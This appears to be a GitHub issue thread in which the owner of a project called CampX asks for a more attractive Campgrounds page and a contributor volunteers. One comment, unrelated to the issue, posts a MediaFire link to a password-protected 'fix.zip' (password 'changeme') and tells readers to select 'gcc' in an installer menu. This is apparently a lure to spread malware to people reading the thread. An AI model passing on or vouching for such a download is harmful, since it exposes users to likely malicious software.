### ISSUE TITLE
[UI] Improve Campgrounds UI

### ISSUE THREAD

**Issue by Vignesh025** [Vignesh025/CampX#2]
**Description**
Improve the UI of Campgrounds page to be more attractive

**Current Behavior**
The current UI is minimalist.

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hugosandsjo** [comment]
Hello! Can i give this a try?

**Comment by Vignesh025** [comment]
yes @hugosandsjo ,sure . 
After completing your work, raise an issue.

**Comment by hugosandsjo** [comment]
Sure @Vignesh025 il write back when ive made the changes

**Comment by Vignesh025** [comment]
@hugosandsjo I moved this project to https://github.com/VigneshDevHub/CampX . 
raise the issue there, after making the changes!
